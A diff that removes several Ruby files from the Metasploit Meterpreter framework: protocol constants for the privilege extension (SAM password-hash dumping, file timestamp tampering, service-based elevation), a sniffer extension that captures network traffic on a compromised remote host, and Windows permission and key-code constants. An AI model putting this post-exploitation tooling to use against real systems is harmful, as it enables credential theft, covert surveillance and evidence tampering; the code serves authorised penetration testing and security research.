106
|
-
attr_writer :fs # :nodoc:
|
107
|
-
|
108
|
-
end
|
109
|
-
|
110
|
-
end; end; end; end; end
|
111
|
-
|
@@ -1,28 +0,0 @@
|
|
1
|
-
module Rex
|
2
|
-
module Post
|
3
|
-
module Meterpreter
|
4
|
-
module Extensions
|
5
|
-
module Priv
|
6
|
-
|
7
|
-
# Passwd
|
8
|
-
TLV_TYPE_SAM_HASHES = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1)
|
9
|
-
|
10
|
-
# Fs
|
11
|
-
TLV_TYPE_FS_FILE_MODIFIED = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 100)
|
12
|
-
TLV_TYPE_FS_FILE_ACCESSED = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 101)
|
13
|
-
TLV_TYPE_FS_FILE_CREATED = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 102)
|
14
|
-
TLV_TYPE_FS_FILE_EMODIFIED = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 103)
|
15
|
-
TLV_TYPE_FS_FILE_PATH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 110)
|
16
|
-
TLV_TYPE_FS_SRC_FILE_PATH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 111)
|
17
|
-
|
18
|
-
# Elevate
|
19
|
-
TLV_TYPE_ELEVATE_TECHNIQUE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 200)
|
20
|
-
TLV_TYPE_ELEVATE_SERVICE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 201)
|
21
|
-
TLV_TYPE_ELEVATE_SERVICE_DLL = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 202)
|
22
|
-
TLV_TYPE_ELEVATE_SERVICE_LENGTH = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 203)
|
23
|
-
|
24
|
-
end
|
25
|
-
end
|
26
|
-
end
|
27
|
-
end
|
28
|
-
end
|
@@ -1,101 +0,0 @@
|
|
1
|
-
#!/usr/bin/env ruby
|
2
|
-
|
3
|
-
require 'rex/post/meterpreter/extensions/sniffer/tlv'
|
4
|
-
require 'rex/proto/smb/utils'
|
5
|
-
|
6
|
-
module Rex
|
7
|
-
module Post
|
8
|
-
module Meterpreter
|
9
|
-
module Extensions
|
10
|
-
module Sniffer
|
11
|
-
|
12
|
-
###
|
13
|
-
#
|
14
|
-
# This meterpreter extension can be used to capture remote traffic
|
15
|
-
#
|
16
|
-
###
|
17
|
-
class Sniffer < Extension
|
18
|
-
|
19
|
-
|
20
|
-
def initialize(client)
|
21
|
-
super(client, 'sniffer')
|
22
|
-
|
23
|
-
client.register_extension_aliases(
|
24
|
-
[
|
25
|
-
{
|
26
|
-
'name' => 'sniffer',
|
27
|
-
'ext' => self
|
28
|
-
},
|
29
|
-
])
|
30
|
-
end
|
31
|
-
|
32
|
-
|
33
|
-
# Enumerate the remote sniffable interfaces
|
34
|
-
def interfaces()
|
35
|
-
ifaces = []
|
36
|
-
ifacei = 0
|
37
|
-
request = Packet.create_request('sniffer_interfaces')
|
38
|
-
response = client.send_request(request)
|
39
|
-
response.each(TLV_TYPE_SNIFFER_INTERFACES) { |p|
|
40
|
-
vals = p.tlvs.map{|x| x.value }
|
41
|
-
iface = { }
|
42
|
-
ikeys = %W{idx name description type mtu wireless usable dhcp}
|
43
|
-
ikeys.each_index { |i| iface[ikeys[i]] = vals[i] }
|
44
|
-
ifaces << iface
|
45
|
-
}
|
46
|
-
return ifaces
|
47
|
-
end
|
48
|
-
|
49
|
-
# Start a packet capture on an opened interface
|
50
|
-
def capture_start(intf,maxp=200000,filter="")
|
51
|
-
request = Packet.create_request('sniffer_capture_start')
|
52
|
-
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
|
53
|
-
request.add_tlv(TLV_TYPE_SNIFFER_PACKET_COUNT, maxp.to_i)
|
54
|
-
request.add_tlv(TLV_TYPE_SNIFFER_ADDITIONAL_FILTER, filter) if filter.length > 0
|
55
|
-
response = client.send_request(request)
|
56
|
-
end
|
57
|
-
|
58
|
-
# Stop an active packet capture
|
59
|
-
def capture_stop(intf)
|
60
|
-
request = Packet.create_request('sniffer_capture_stop')
|
61
|
-
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
|
62
|
-
response = client.send_request(request)
|
63
|
-
end
|
64
|
-
|
65
|
-
# Retrieve stats about a current capture
|
66
|
-
def capture_stats(intf)
|
67
|
-
request = Packet.create_request('sniffer_capture_stats')
|
68
|
-
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
|
69
|
-
response = client.send_request(request)
|
70
|
-
{
|
71
|
-
:packets => response.get_tlv_value(TLV_TYPE_SNIFFER_PACKET_COUNT),
|
72
|
-
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
|
73
|
-
}
|
74
|
-
end
|
75
|
-
|
76
|
-
# Buffer the current capture to a readable buffer
|
77
|
-
def capture_dump(intf)
|
78
|
-
request = Packet.create_request('sniffer_capture_dump')
|
79
|
-
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
|
80
|
-
response = client.send_request(request, 3600)
|
81
|
-
{
|
82
|
-
:packets => response.get_tlv_value(TLV_TYPE_SNIFFER_PACKET_COUNT),
|
83
|
-
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
|
84
|
-
}
|
85
|
-
end
|
86
|
-
|
87
|
-
# Retrieve the packet data for the specified capture
|
88
|
-
def capture_dump_read(intf, len=16384)
|
89
|
-
request = Packet.create_request('sniffer_capture_dump_read')
|
90
|
-
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
|
91
|
-
request.add_tlv(TLV_TYPE_SNIFFER_BYTE_COUNT, len.to_i)
|
92
|
-
response = client.send_request(request, 3600)
|
93
|
-
{
|
94
|
-
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
|
95
|
-
:data => response.get_tlv_value(TLV_TYPE_SNIFFER_PACKET)
|
96
|
-
}
|
97
|
-
end
|
98
|
-
|
99
|
-
end
|
100
|
-
|
101
|
-
end; end; end; end; end
|
@@ -1,26 +0,0 @@
|
|
1
|
-
module Rex
|
2
|
-
module Post
|
3
|
-
module Meterpreter
|
4
|
-
module Extensions
|
5
|
-
module Sniffer
|
6
|
-
|
7
|
-
TLV_TYPE_EXTENSION_SNIFFER = 0
|
8
|
-
TLV_TYPE_SNIFFER_INTERFACES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 1)
|
9
|
-
TLV_TYPE_SNIFFER_INTERFACE_ID = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 2)
|
10
|
-
TLV_TYPE_SNIFFER_INTERFACE_HANDLE = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 3)
|
11
|
-
TLV_TYPE_SNIFFER_PACKET_COUNT = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 4)
|
12
|
-
TLV_TYPE_SNIFFER_BYTE_COUNT = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 5)
|
13
|
-
|
14
|
-
TLV_TYPE_SNIFFER_EXCLUDE_PORTS = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 6)
|
15
|
-
TLV_TYPE_SNIFFER_INCLUDE_PORTS = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 7)
|
16
|
-
|
17
|
-
TLV_TYPE_SNIFFER_PACKETS = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 8)
|
18
|
-
TLV_TYPE_SNIFFER_PACKET = TLV_META_TYPE_RAW | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 9)
|
19
|
-
|
20
|
-
TLV_TYPE_SNIFFER_ADDITIONAL_FILTER = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 10)
|
21
|
-
|
22
|
-
end
|
23
|
-
end
|
24
|
-
end
|
25
|
-
end
|
26
|
-
end
|
@@ -1,333 +0,0 @@
|
|
1
|
-
#!/usr/bin/env ruby
|
2
|
-
|
3
|
-
###
|
4
|
-
#
|
5
|
-
# Windows Specific Constants
|
6
|
-
# --------------------------
|
7
|
-
#
|
8
|
-
# These are put into the global namespace for now
|
9
|
-
# so that they can be referenced globally.
|
10
|
-
#
|
11
|
-
###
|
12
|
-
|
13
|
-
##
|
14
|
-
#
|
15
|
-
# Permissions
|
16
|
-
#
|
17
|
-
##
|
18
|
-
DELETE = 0x00010000
|
19
|
-
READ_CONTROL = 0x00020000
|
20
|
-
WRITE_DAC = 0x00040000
|
21
|
-
WRITE_OWNER = 0x00080000
|
22
|
-
SYNCHRONIZE = 0x00100000
|
23
|
-
STANDARD_RIGHTS_REQUIRED = 0x000f0000
|
24
|
-
STANDARD_RIGHTS_READ = READ_CONTROL
|
25
|
-
STANDARD_RIGHTS_WRITE = READ_CONTROL
|
26
|
-
STANDARD_RIGHTS_EXECUTE = READ_CONTROL
|
27
|
-
STANDARD_RIGHTS_ALL = 0x001f0000
|
28
|
-
SPECIFIC_RIGHTS_ALL = 0x0000ffff
|
29
|
-
MAXIMUM_ALLOWED = 0x02000000
|
30
|
-
GENERIC_READ = 0x80000000
|
31
|
-
GENERIC_WRITE = 0x40000000
|
32
|
-
GENERIC_EXECUTE = 0x20000000
|
33
|
-
GENERIC_ALL = 0x10000000
|
34
|
-
|
35
|
-
##
|
36
|
-
#
|
37
|
-
# Page Protections
|
38
|
-
#
|
39
|
-
##
|
40
|
-
PAGE_NOACCESS = 0x00000001
|
41
|
-
PAGE_READONLY = 0x00000002
|
42
|
-
PAGE_READWRITE = 0x00000004
|
43
|
-
PAGE_WRITECOPY = 0x00000008
|
44
|
-
PAGE_EXECUTE = 0x00000010
|
45
|
-
PAGE_EXECUTE_READ = 0x00000020
|
46
|
-
PAGE_EXECUTE_READWRITE = 0x00000040
|
47
|
-
PAGE_EXECUTE_WRITECOPY = 0x00000080
|
48
|
-
PAGE_GUARD = 0x00000100
|
49
|
-
PAGE_NOCACHE = 0x00000200
|
50
|
-
PAGE_WRITECOMBINE = 0x00000400
|
51
|
-
MEM_COMMIT = 0x00001000
|
52
|
-
MEM_RESERVE = 0x00002000
|
53
|
-
MEM_DECOMMIT = 0x00004000
|
54
|
-
MEM_RELEASE = 0x00008000
|
55
|
-
MEM_FREE = 0x00010000
|
56
|
-
MEM_PRIVATE = 0x00020000
|
57
|
-
MEM_MAPPED = 0x00040000
|
58
|
-
MEM_RESET = 0x00080000
|
59
|
-
MEM_TOP_DOWN = 0x00100000
|
60
|
-
MEM_WRITE_WATCH = 0x00200000
|
61
|
-
MEM_PHYSICAL = 0x00400000
|
62
|
-
MEM_LARGE_PAGES = 0x20000000
|
63
|
-
MEM_4MB_PAGES = 0x80000000
|
64
|
-
SEC_FILE = 0x00800000
|
65
|
-
SEC_IMAGE = 0x01000000
|
66
|
-
SEC_RESERVE = 0x04000000
|
67
|
-
SEC_COMMIT = 0x08000000
|
68
|
-
SEC_NOCACHE = 0x10000000
|
69
|
-
MEM_IMAGE = SEC_IMAGE
|
70
|
-
|
71
|
-
##
|
72
|
-
#
|
73
|
-
# Registry Permissions
|
74
|
-
#
|
75
|
-
##
|
76
|
-
KEY_QUERY_VALUE = 0x00000001
|
77
|
-
KEY_SET_VALUE = 0x00000002
|
78
|
-
KEY_CREATE_SUB_KEY = 0x00000004
|
79
|
-
KEY_ENUMERATE_SUB_KEYS = 0x00000008
|
80
|
-
KEY_NOTIFY = 0x00000010
|
81
|
-
KEY_CREATE_LINK = 0x00000020
|
82
|
-
KEY_READ = (STANDARD_RIGHTS_READ | KEY_QUERY_VALUE |
|
83
|
-
KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY) & ~SYNCHRONIZE
|
84
|
-
KEY_WRITE = (STANDARD_RIGHTS_WRITE | KEY_SET_VALUE |
|
85
|
-
KEY_CREATE_SUB_KEY) & ~SYNCHRONIZE
|
86
|
-
KEY_EXECUTE = KEY_READ
|
87
|
-
KEY_ALL_ACCESS = (STANDARD_RIGHTS_ALL | KEY_QUERY_VALUE |
|
88
|
-
KEY_SET_VALUE | KEY_CREATE_SUB_KEY |
|
89
|
-
KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY |
|
90
|
-
KEY_CREATE_LINK) & ~SYNCHRONIZE
|
91
|
-
|
92
|
-
##
|
93
|
-
#
|
94
|
-
# Registry
|
95
|
-
#
|
96
|
-
##
|
97
|
-
HKEY_CLASSES_ROOT = 0x80000000
|
98
|
-
HKEY_CURRENT_USER = 0x80000001
|
99
|
-
HKEY_LOCAL_MACHINE = 0x80000002
|
100
|
-
HKEY_USERS = 0x80000003
|
101
|
-
HKEY_PERFORMANCE_DATA = 0x80000004
|
102
|
-
HKEY_CURRENT_CONFIG = 0x80000005
|
103
|
-
HKEY_DYN_DATA = 0x80000006
|
104
|
-
|
105
|
-
REG_NONE = 0
|
106
|
-
REG_SZ = 1
|
107
|
-
REG_EXPAND_SZ = 2
|
108
|
-
REG_BINARY = 3
|
109
|
-
REG_DWORD = 4
|
110
|
-
REG_DWORD_LITTLE_ENDIAN = 4
|
111
|
-
REG_DWORD_BIG_ENDIAN = 5
|
112
|
-
REG_LINK = 6
|
113
|
-
REG_MULTI_SZ = 7
|
114
|
-
|
115
|
-
##
|
116
|
-
#
|
117
|
-
# Process Permissions
|
118
|
-
#
|
119
|
-
##
|
120
|
-
PROCESS_TERMINATE = 0x00000001
|
121
|
-
PROCESS_CREATE_THREAD = 0x00000002
|
122
|
-
PROCESS_SET_SESSIONID = 0x00000004
|
123
|
-
PROCESS_VM_OPERATION = 0x00000008
|
124
|
-
PROCESS_VM_READ = 0x00000010
|
125
|
-
PROCESS_VM_WRITE = 0x00000020
|
126
|
-
PROCESS_DUP_HANDLE = 0x00000040
|
127
|
-
PROCESS_CREATE_PROCESS = 0x00000080
|
128
|
-
PROCESS_SET_QUOTA = 0x00000100
|
129
|
-
PROCESS_SET_INFORMATION = 0x00000200
|
130
|
-
PROCESS_QUERY_INFORMATION= 0x00000400
|
131
|
-
PROCESS_SUSPEND_RESUME = 0x00000800
|
132
|
-
PROCESS_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF
|
133
|
-
|
134
|
-
##
|
135
|
-
#
|
136
|
-
# Thread Permissions
|
137
|
-
#
|
138
|
-
##
|
139
|
-
THREAD_TERMINATE = 0x00000001
|
140
|
-
THREAD_SUSPEND_RESUME = 0x00000002
|
141
|
-
THREAD_GET_CONTEXT = 0x00000008
|
142
|
-
THREAD_SET_CONTEXT = 0x00000010
|
143
|
-
THREAD_SET_INFORMATION = 0x00000020
|
144
|
-
THREAD_QUERY_INFORMATION = 0x00000040
|
145
|
-
THREAD_SET_THREAD_TOKEN = 0x00000080
|
146
|
-
THREAD_IMPERSONATE = 0x00000100
|
147
|
-
THREAD_DIRECT_IMPERSONATION = 0x00000200
|
148
|
-
THREAD_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x3FF
|
149
|
-
|
150
|
-
##
|
151
|
-
#
|
152
|
-
# Creation flags
|
153
|
-
#
|
154
|
-
##
|
155
|
-
|
156
|
-
CREATE_SUSPENDED = 0x00000004
|
157
|
-
|
158
|
-
##
|
159
|
-
#
|
160
|
-
# Event Log
|
161
|
-
#
|
162
|
-
##
|
163
|
-
EVENTLOG_SEQUENTIAL_READ = 0x00000001
|
164
|
-
EVENTLOG_SEEK_READ = 0x00000002
|
165
|
-
EVENTLOG_FORWARDS_READ = 0x00000004
|
166
|
-
EVENTLOG_BACKWARDS_READ = 0x00000008
|
167
|
-
|
168
|
-
##
|
169
|
-
#
|
170
|
-
# Event Log
|
171
|
-
#
|
172
|
-
##
|
173
|
-
EWX_LOGOFF = 0
|
174
|
-
EWX_SHUTDOWN = 0x00000001
|
175
|
-
EWX_REBOOT = 0x00000002
|
176
|
-
EWX_FORCE = 0x00000004
|
177
|
-
EWX_POWEROFF = 0x00000008
|
178
|
-
EWX_FORCEIFHUNG = 0x00000010
|
179
|
-
|
180
|
-
|
181
|
-
##
|
182
|
-
#
|
183
|
-
# Keyboard Mappings
|
184
|
-
#
|
185
|
-
##
|
186
|
-
|
187
|
-
VirtualKeyCodes = {
|
188
|
-
1 => %W{ LClick },
|
189
|
-
2 => %W{ RClick },
|
190
|
-
3 => %W{ Cancel },
|
191
|
-
4 => %W{ MClick },
|
192
|
-
8 => %W{ Back },
|
193
|
-
9 => %W{ Tab },
|
194
|
-
10 => %W{ Newline },
|
195
|
-
12 => %W{ Clear },
|
196
|
-
13 => %W{ Return },
|
197
|
-
|
198
|
-
16 => %W{ Shift },
|
199
|
-
17 => %W{ Ctrl },
|
200
|
-
18 => %W{ Alt },
|
201
|
-
19 => %W{ Pause },
|
202
|
-
20 => %W{ CapsLock },
|
203
|
-
|
204
|
-
27 => %W{ Esc },
|
205
|
-
|
206
|
-
32 => %W{ Space },
|
207
|
-
33 => %W{ Prior },
|
208
|
-
34 => %W{ Next },
|
209
|
-
35 => %W{ End },
|
210
|
-
36 => %W{ Home },
|
211
|
-
37 => %W{ Left },
|
212
|
-
38 => %W{ Up },
|
213
|
-
39 => %W{ Right },
|
214
|
-
40 => %W{ Down },
|
215
|
-
41 => %W{ Select },
|
216
|
-
42 => %W{ Print },
|
217
|
-
43 => %W{ Execute },
|
218
|
-
44 => %W{ Snapshot },
|
219
|
-
45 => %W{ Insert },
|
220
|
-
46 => %W{ Delete },
|
221
|
-
47 => %W{ Help },
|
222
|
-
48 => %W{ 0 )},
|
223
|
-
49 => %W{ 1 !},
|
224
|
-
50 => %W{ 2 @},
|
225
|
-
51 => %W{ 3 #},
|
226
|
-
52 => %W{ 4 $},
|
227
|
-
53 => %W{ 5 %},
|
228
|
-
54 => %W{ 6 ^},
|
229
|
-
55 => %W{ 7 &},
|
230
|
-
56 => %W{ 8 *},
|
231
|
-
57 => %W{ 9 (},
|
232
|
-
65 => %W{ a A},
|
233
|
-
66 => %W{ b B},
|
234
|
-
67 => %W{ c C},
|
235
|
-
68 => %W{ d D},
|
236
|
-
69 => %W{ e E},
|
237
|
-
70 => %W{ f F},
|
238
|
-
71 => %W{ g G},
|
239
|
-
72 => %W{ h H},
|
240
|
-
73 => %W{ i I},
|
241
|
-
74 => %W{ j J},
|
242
|
-
75 => %W{ k K},
|
243
|
-
76 => %W{ l L},
|
244
|
-
77 => %W{ m M},
|
245
|
-
78 => %W{ n N},
|
246
|
-
79 => %W{ o O},
|
247
|
-
80 => %W{ p P},
|
248
|
-
81 => %W{ q Q},
|
249
|
-
82 => %W{ r R},
|
250
|
-
83 => %W{ s S},
|
251
|
-
84 => %W{ t T},
|
252
|
-
85 => %W{ u U},
|
253
|
-
86 => %W{ v V},
|
254
|
-
87 => %W{ w W},
|
255
|
-
88 => %W{ x X},
|
256
|
-
89 => %W{ y Y},
|
257
|
-
90 => %W{ z Z},
|
258
|
-
91 => %W{ LWin },
|
259
|
-
92 => %W{ RWin },
|
260
|
-
93 => %W{ Apps },
|
261
|
-
|
262
|
-
95 => %W{ Sleep },
|
263
|
-
96 => %W{ N0 },
|
264
|
-
97 => %W{ N1 },
|
265
|
-
98 => %W{ N2 },
|
266
|
-
99 => %W{ N3 },
|
267
|
-
100 => %W{ N4 },
|
268
|
-
101 => %W{ N5 },
|
269
|
-
102 => %W{ N6 },
|
270
|
-
103 => %W{ N7 },
|
271
|
-
104 => %W{ N8 },
|
272
|
-
105 => %W{ N9 },
|
273
|
-
106 => %W{ Multiply },
|
274
|
-
107 => %W{ Add },
|
275
|
-
108 => %W{ Separator },
|
276
|
-
109 => %W{ Subtract },
|
277
|
-
110 => %W{ Decimal },
|
278
|
-
111 => %W{ Divide },
|
279
|
-
112 => %W{ F1 },
|
280
|
-
113 => %W{ F2 },
|
281
|
-
114 => %W{ F3 },
|
282
|
-
115 => %W{ F4 },
|
283
|
-
116 => %W{ F5 },
|
284
|
-
117 => %W{ F6 },
|
285
|
-
118 => %W{ F7 },
|
286
|
-
119 => %W{ F8 },
|
287
|
-
120 => %W{ F9 },
|
288
|
-
121 => %W{ F10 },
|
289
|
-
122 => %W{ F11 },
|
290
|
-
123 => %W{ F12 },
|
291
|
-
124 => %W{ F13 },
|
292
|
-
125 => %W{ F14 },
|
293
|
-
126 => %W{ F15 },
|
294
|
-
127 => %W{ F16 },
|
295
|
-
128 => %W{ F17 },
|
296
|
-
129 => %W{ F18 },
|
297
|
-
130 => %W{ F19 },
|
298
|
-
131 => %W{ F20 },
|
299
|
-
132 => %W{ F21 },
|
300
|
-
133 => %W{ F22 },
|
301
|
-
134 => %W{ F23 },
|
302
|
-
135 => %W{ F24 },
|
303
|
-
144 => %W{ NumLock },
|
304
|
-
145 => %W{ Scroll },
|
305
|
-
160 => %W{ LShift },
|
306
|
-
161 => %W{ RShift },
|
307
|
-
162 => %W{ LCtrl },
|
308
|
-
163 => %W{ RCtrl },
|
309
|
-
164 => %W{ LMenu },
|
310
|
-
165 => %W{ RMenu },
|
311
|
-
166 => %W{ Back },
|
312
|
-
167 => %W{ Forward },
|
313
|
-
168 => %W{ Refresh },
|
314
|
-
169 => %W{ Stop },
|
315
|
-
170 => %W{ Search },
|
316
|
-
171 => %W{ Favorites },
|
317
|
-
172 => %W{ Home },
|
318
|
-
176 => %W{ Forward },
|
319
|
-
177 => %W{ Reverse },
|
320
|
-
178 => %W{ Stop },
|
321
|
-
179 => %W{ Play },
|
322
|
-
186 => %W{ ; :},
|
323
|
-
187 => %W{ = +},
|
324
|
-
188 => %W{ , <},
|
325
|
-
189 => %W{ - _},
|
326
|
-
190 => %W{ . >},
|
327
|
-
191 => %W{ / ?},
|
328
|
-
192 => %W{ ' ~},
|
329
|
-
219 => %W| [ {|,
|
330
|
-
220 => %W{ \ |},
|
331
|
-
221 => %W| ] }|,
|
332
|
-
222 => %W{ ' Quotes},
|
333
|
-
}
|